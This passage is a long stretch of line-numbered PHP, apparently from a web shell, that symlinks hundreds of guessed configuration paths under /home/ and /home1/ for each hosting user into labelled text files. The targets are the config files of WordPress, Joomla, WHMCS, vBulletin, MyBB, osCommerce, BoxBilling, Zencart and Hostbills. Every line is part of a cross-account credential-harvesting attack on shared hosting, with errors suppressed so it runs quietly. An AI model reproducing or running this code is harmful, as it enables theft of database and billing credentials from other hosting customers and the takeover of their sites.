2360. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
2361. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
2362. @symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
2363. @symlink('/home/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
2364. @symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
2365. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
2366. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
2367. @symlink('/home/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
2368. @symlink('/home/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
2369. @symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
2370. @symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
2371. @symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
2372. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
2373. @symlink('/home/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
2374. @symlink('/home/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
2375. @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
2376. @symlink('/home/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
2377. @symlink('/home/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
2378. @symlink('/home/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
2379. @symlink('/home/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
2380. @symlink('/home/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
2381. @symlink('/home/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
2382. @symlink('/home/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
2383. @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
2384. @symlink('/home/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
2385. @symlink('/home/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
2386. @symlink('/home/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
2387. @symlink('/home/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
2388. @symlink('/home/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
2389. @symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
2390. @symlink('/home/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
2391. @symlink('/home/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
2392. @symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
2393. @symlink('/home/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
2394. @symlink('/home/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
2395. @symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
2396. @symlink('/home/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
2397. @symlink('/home/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
2398. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
2399. @symlink('/home/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
2400. @symlink('/home/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
2401. @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
2402. @symlink('/home/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
2403. @symlink('/home/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
2404. @symlink('/home/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
2405. @symlink('/home/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
2406. @symlink('/home/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
2407. @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
2408. @symlink('/home/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
2409. @symlink('/home/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
2410. @symlink('/home/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
2411. @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
2412. @symlink('/home/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
2413. @symlink('/home/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
2414. @symlink('/home/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
2415. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
2416. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
2417. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
2418. @symlink('/home/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
2419. @symlink('/home/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
2420. @symlink('/home/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
2421. @symlink('/home/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
2422. @symlink('/home/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
2423. @symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
2424. @symlink('/home/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
2425. @symlink('/home/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
2426. @symlink('/home/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
2427. @symlink('/home/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
2428. @symlink('/home/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
2429. @symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
2430. @symlink('/home/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
2431. @symlink('/home/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
2432. @symlink('/home/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
2433. @symlink('/home/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
2434. @symlink('/home/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
2435. @symlink('/home/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
2436. @symlink('/home/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
2437. @symlink('/home/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
2438. @symlink('/home/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
2439. @symlink('/home/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
2440. @symlink('/home/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
2441. @symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
2442. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
2443. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
2444. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
2445. @symlink('/home/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
2446. @symlink('/home/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
2447. @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
2448. @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
2449. @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
2450. @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
2451. @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
2452. @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
2453. @symlink('/home/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
2454. @symlink('/home/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
2455. @symlink('/home/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
2456. @symlink('/home/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
2457. @symlink('/home/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
2458. @symlink('/home/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
2459. @symlink('/home/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
2460. @symlink('/home/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
2461. @symlink('/home/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
2462. @symlink('/home/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
2463. @symlink('/home/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
2464. @symlink('/home/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
2465. @symlink('/home/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
2466. @symlink('/home/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
2467. @symlink('/home/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
2468. @symlink('/home/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
2469. @symlink('/home/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
2470. @symlink('/home/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
2471. @symlink('/home/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
2472. @symlink('/home/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
2473. @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
2474. @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
2475. @symlink('/home/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
2476. @symlink('/home/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
2477. @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
2478. @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
2479. @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
2480. @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
2481. @symlink('/home/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
2482. @symlink('/home/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
2483. @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
2484. @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
2485. @symlink('/home/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
2486. @symlink('/home/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
2487. @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
2488. @symlink('/home/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
2489. @symlink('/home/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
2490. @symlink('/home/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
2491. @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
2492. @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
2493. @symlink('/home/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
2494. @symlink('/home/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
2495. @symlink('/home/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
2496.  
2497. //Home1
2498.  
2499. @symlink('/home1/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
2500. @symlink('/home1/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
2501. @symlink('/home1/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
2502. @symlink('/home1/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
2503. @symlink('/home1/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
2504. @symlink('/home1/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
2505. @symlink('/home1/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
2506. @symlink('/home1/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
2507. @symlink('/home1/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
2508. @symlink('/home1/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
2509. @symlink('/home1/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
2510. @symlink('/home1/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
2511. @symlink('/home1/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
2512. @symlink('/home1/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
2513. @symlink('/home1/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
2514. @symlink('/home1/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
2515. @symlink('/home1/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
2516. @symlink('/home1/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
2517. @symlink('/home1/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
2518. @symlink('/home1/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
2519. @symlink('/home1/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
2520. @symlink('/home1/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
2521. @symlink('/home1/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
2522. @symlink('/home1/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
2523. @symlink('/home1/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
2524. @symlink('/home1/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
2525. @symlink('/home1/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
2526. @symlink('/home1/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
2527. @symlink('/home1/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
2528. @symlink('/home1/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
2529. @symlink('/home1/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
2530. @symlink('/home1/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
2531. @symlink('/home1/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
2532. @symlink('/home1/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
2533. @symlink('/home1/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
2534. @symlink('/home1/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
2535. @symlink('/home1/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
2536. @symlink('/home1/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
2537. @symlink('/home1/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
2538. @symlink('/home1/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
2539. @symlink('/home1/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
2540. @symlink('/home1/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
2541. @symlink('/home1/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
2542. @symlink('/home1/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
2543. @symlink('/home1/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
2544. @symlink('/home1/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
2545. @symlink('/home1/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
2546. @symlink('/home1/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
2547. @symlink('/home1/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
2548. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
2549. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
2550. @symlink('/home1/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
2551. @symlink('/home1/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
2552. @symlink('/home1/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
2553. @symlink('/home1/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
2554. @symlink('/home1/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
2555. @symlink('/home1/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
2556. @symlink('/home1/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
2557. @symlink('/home1/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
2558. @symlink('/home1/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
2559. @symlink('/home1/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
2560. @symlink('/home1/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
2561. @symlink('/home1/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
2562. @symlink('/home1/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
2563. @symlink('/home1/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
2564. @symlink('/home1/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
2565. @symlink('/home1/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
2566. @symlink('/home1/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
2567. @symlink('/home1/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
2568. @symlink('/home1/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
2569. @symlink('/home1/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
2570. @symlink('/home1/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
2571. @symlink('/home1/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
2572. @symlink('/home1/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
2573. @symlink('/home1/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
2574. @symlink('/home1/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
2575. @symlink('/home1/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
2576. @symlink('/home1/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
2577. @symlink('/home1/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
2578. @symlink('/home1/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
2579. @symlink('/home1/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
2580. @symlink('/home1/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
2581. @symlink('/home1/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
2582. @symlink('/home1/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
2583. @symlink('/home1/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
2584. @symlink('/home1/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
2585. @symlink('/home1/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
2586. @symlink('/home1/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
2587. @symlink('/home1/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
2588. @symlink('/home1/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
2589. @symlink('/home1/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
2590. @symlink('/home1/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
2591. @symlink('/home1/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
2592. @symlink('/home1/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
2593. @symlink('/home1/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
2594. @symlink('/home1/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
2595. @symlink('/home1/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
2596. @symlink('/home1/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
2597. @symlink('/home1/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
2598. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
2599. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
2600. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
2601. @symlink('/home1/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
2602. @symlink('/home1/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
2603. @symlink('/home1/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
2604. @symlink('/home1/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
2605. @symlink('/home1/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
2606. @symlink('/home1/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
2607. @symlink('/home1/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
2608. @symlink('/home1/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
2609. @symlink('/home1/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
2610. @symlink('/home1/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
2611. @symlink('/home1/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
2612. @symlink('/home1/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
2613. @symlink('/home1/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
2614. @symlink('/home1/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
2615. @symlink('/home1/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
2616. @symlink('/home1/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
2617. @symlink('/home1/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
2618. @symlink('/home1/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
2619. @symlink('/home1/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
2620. @symlink('/home1/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
2621. @symlink('/home1/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
2622. @symlink('/home1/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
2623. @symlink('/home1/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
2624. @symlink('/home1/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
2625. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
2626. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
2627. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
2628. @symlink('/home1/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
2629. @symlink('/home1/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
2630. @symlink('/home1/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
2631. @symlink('/home1/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
2632. @symlink('/home1/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
2633. @symlink('/home1/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
2634. @symlink('/home1/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
2635. @symlink('/home1/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
2636. @symlink('/home1/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
2637. @symlink('/home1/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
2638. @symlink('/home1/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
2639. @symlink('/home1/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
2640. @symlink('/home1/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
2641. @symlink('/home1/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
2642. @symlink('/home1/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
2643. @symlink('/home1/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
2644. @symlink('/home1/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
2645. @symlink('/home1/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
2646. @symlink('/home1/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
2647. @symlink('/home1/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
2648. @symlink('/home1/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
2649. @symlink('/home1/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
2650. @symlink('/home1/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
2651. @symlink('/home1/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
2652. @symlink('/home1/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
2653. @symlink('/home1/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
2654. @symlink('/home1/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
2655. @symlink('/home1/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
2656. @symlink('/home1/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
2657. @symlink('/home1/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
2658. @symlink('/home1/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
2659. @symlink('/home1/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
2660. @symlink('/home1/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
2661. @symlink('/home1/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
2662. @symlink('/home1/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
2663. @symlink('/home1/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
2664. @symlink('/home1/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
2665. @symlink('/home1/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
2666. @symlink('/home1/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
2667. @symlink('/home1/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
2668. @symlink('/home1/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
2669. @symlink('/home1/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
2670. @symlink('/home1/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
2671. @symlink('/home1/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
2672. @symlink('/home1/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
2673. @symlink('/home1/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
